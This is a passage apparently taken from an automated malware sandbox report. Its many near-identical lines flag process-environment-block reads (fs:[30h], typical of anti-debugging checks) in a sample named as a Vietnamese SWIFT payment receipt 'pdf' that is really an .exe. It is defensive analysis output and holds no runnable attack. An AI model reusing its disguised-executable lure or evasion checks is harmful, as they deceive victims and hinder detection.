Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0120E5E7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C5ED mov eax, dword ptr fs:[00000030h]	4_2_0121C5ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C5ED mov eax, dword ptr fs:[00000030h]	4_2_0121C5ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E65D0 mov eax, dword ptr fs:[00000030h]	4_2_011E65D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E5CF mov eax, dword ptr fs:[00000030h]	4_2_0121E5CF
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E5CF mov eax, dword ptr fs:[00000030h]	4_2_0121E5CF
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A5D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A5D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E25E0 mov eax, dword ptr fs:[00000030h]	4_2_011E25E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01266420 mov eax, dword ptr fs:[00000030h]	4_2_01266420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A430 mov eax, dword ptr fs:[00000030h]	4_2_0121A430
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01218402 mov eax, dword ptr fs:[00000030h]	4_2_01218402
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01218402 mov eax, dword ptr fs:[00000030h]	4_2_01218402
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01218402 mov eax, dword ptr fs:[00000030h]	4_2_01218402
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DC427 mov eax, dword ptr fs:[00000030h]	4_2_011DC427
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE420 mov eax, dword ptr fs:[00000030h]	4_2_011DE420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE420 mov eax, dword ptr fs:[00000030h]	4_2_011DE420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DE420 mov eax, dword ptr fs:[00000030h]	4_2_011DE420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D645D mov eax, dword ptr fs:[00000030h]	4_2_011D645D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126C460 mov ecx, dword ptr fs:[00000030h]	4_2_0126C460
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120A470 mov eax, dword ptr fs:[00000030h]	4_2_0120A470
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120A470 mov eax, dword ptr fs:[00000030h]	4_2_0120A470
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120A470 mov eax, dword ptr fs:[00000030h]	4_2_0120A470
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E443 mov eax, dword ptr fs:[00000030h]	4_2_0121E443
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120245A mov eax, dword ptr fs:[00000030h]	4_2_0120245A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129A456 mov eax, dword ptr fs:[00000030h]	4_2_0129A456
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012144B0 mov ecx, dword ptr fs:[00000030h]	4_2_012144B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0126A4B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129A49A mov eax, dword ptr fs:[00000030h]	4_2_0129A49A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E64AB mov eax, dword ptr fs:[00000030h]	4_2_011E64AB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E04E5 mov ecx, dword ptr fs:[00000030h]	4_2_011E04E5
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C720 mov eax, dword ptr fs:[00000030h]	4_2_0121C720
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C720 mov eax, dword ptr fs:[00000030h]	4_2_0121C720
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0710 mov eax, dword ptr fs:[00000030h]	4_2_011E0710
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125C730 mov eax, dword ptr fs:[00000030h]	4_2_0125C730
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121273C mov eax, dword ptr fs:[00000030h]	4_2_0121273C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121273C mov ecx, dword ptr fs:[00000030h]	4_2_0121273C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121273C mov eax, dword ptr fs:[00000030h]	4_2_0121273C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C700 mov eax, dword ptr fs:[00000030h]	4_2_0121C700
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01210710 mov eax, dword ptr fs:[00000030h]	4_2_01210710
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0750 mov eax, dword ptr fs:[00000030h]	4_2_011E0750
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121674D mov esi, dword ptr fs:[00000030h]	4_2_0121674D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121674D mov eax, dword ptr fs:[00000030h]	4_2_0121674D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121674D mov eax, dword ptr fs:[00000030h]	4_2_0121674D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8770 mov eax, dword ptr fs:[00000030h]	4_2_011E8770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770 mov eax, dword ptr fs:[00000030h]	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222750 mov eax, dword ptr fs:[00000030h]	4_2_01222750
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222750 mov eax, dword ptr fs:[00000030h]	4_2_01222750
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01264755 mov eax, dword ptr fs:[00000030h]	4_2_01264755
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126E75D mov eax, dword ptr fs:[00000030h]	4_2_0126E75D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012947A0 mov eax, dword ptr fs:[00000030h]	4_2_012947A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128678E mov eax, dword ptr fs:[00000030h]	4_2_0128678E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E07AF mov eax, dword ptr fs:[00000030h]	4_2_011E07AF
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0126E7E1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012027ED mov eax, dword ptr fs:[00000030h]	4_2_012027ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012027ED mov eax, dword ptr fs:[00000030h]	4_2_012027ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012027ED mov eax, dword ptr fs:[00000030h]	4_2_012027ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EC7C0 mov eax, dword ptr fs:[00000030h]	4_2_011EC7C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E47FB mov eax, dword ptr fs:[00000030h]	4_2_011E47FB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E47FB mov eax, dword ptr fs:[00000030h]	4_2_011E47FB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012607C3 mov eax, dword ptr fs:[00000030h]	4_2_012607C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01216620 mov eax, dword ptr fs:[00000030h]	4_2_01216620
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01218620 mov eax, dword ptr fs:[00000030h]	4_2_01218620
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F260B mov eax, dword ptr fs:[00000030h]	4_2_011F260B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E609 mov eax, dword ptr fs:[00000030h]	4_2_0125E609
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E262C mov eax, dword ptr fs:[00000030h]	4_2_011E262C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE627 mov eax, dword ptr fs:[00000030h]	4_2_011FE627
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222619 mov eax, dword ptr fs:[00000030h]	4_2_01222619
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A660 mov eax, dword ptr fs:[00000030h]	4_2_0121A660
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A660 mov eax, dword ptr fs:[00000030h]	4_2_0121A660
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A866E mov eax, dword ptr fs:[00000030h]	4_2_012A866E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A866E mov eax, dword ptr fs:[00000030h]	4_2_012A866E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01212674 mov eax, dword ptr fs:[00000030h]	4_2_01212674
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FC640 mov eax, dword ptr fs:[00000030h]	4_2_011FC640
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0121C6A6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4690 mov eax, dword ptr fs:[00000030h]	4_2_011E4690
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4690 mov eax, dword ptr fs:[00000030h]	4_2_011E4690
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012166B0 mov eax, dword ptr fs:[00000030h]	4_2_012166B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0125E6F2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0125E6F2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0125E6F2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0125E6F2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012606F1 mov eax, dword ptr fs:[00000030h]	4_2_012606F1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012606F1 mov eax, dword ptr fs:[00000030h]	4_2_012606F1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0121A6C7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0121A6C7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8918 mov eax, dword ptr fs:[00000030h]	4_2_011D8918
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8918 mov eax, dword ptr fs:[00000030h]	4_2_011D8918
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126892A mov eax, dword ptr fs:[00000030h]	4_2_0126892A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0127892B mov eax, dword ptr fs:[00000030h]	4_2_0127892B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E908 mov eax, dword ptr fs:[00000030h]	4_2_0125E908
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125E908 mov eax, dword ptr fs:[00000030h]	4_2_0125E908
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126C912 mov eax, dword ptr fs:[00000030h]	4_2_0126C912
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01206962 mov eax, dword ptr fs:[00000030h]	4_2_01206962
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01206962 mov eax, dword ptr fs:[00000030h]	4_2_01206962
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01206962 mov eax, dword ptr fs:[00000030h]	4_2_01206962
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0122096E mov eax, dword ptr fs:[00000030h]	4_2_0122096E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0122096E mov edx, dword ptr fs:[00000030h]	4_2_0122096E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0122096E mov eax, dword ptr fs:[00000030h]	4_2_0122096E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01284978 mov eax, dword ptr fs:[00000030h]	4_2_01284978
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01284978 mov eax, dword ptr fs:[00000030h]	4_2_01284978
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126C97C mov eax, dword ptr fs:[00000030h]	4_2_0126C97C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01260946 mov eax, dword ptr fs:[00000030h]	4_2_01260946
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4940 mov eax, dword ptr fs:[00000030h]	4_2_012B4940
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012689B3 mov esi, dword ptr fs:[00000030h]	4_2_012689B3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012689B3 mov eax, dword ptr fs:[00000030h]	4_2_012689B3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012689B3 mov eax, dword ptr fs:[00000030h]	4_2_012689B3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E09AD mov eax, dword ptr fs:[00000030h]	4_2_011E09AD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E09AD mov eax, dword ptr fs:[00000030h]	4_2_011E09AD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0 mov eax, dword ptr fs:[00000030h]	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0126E9E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
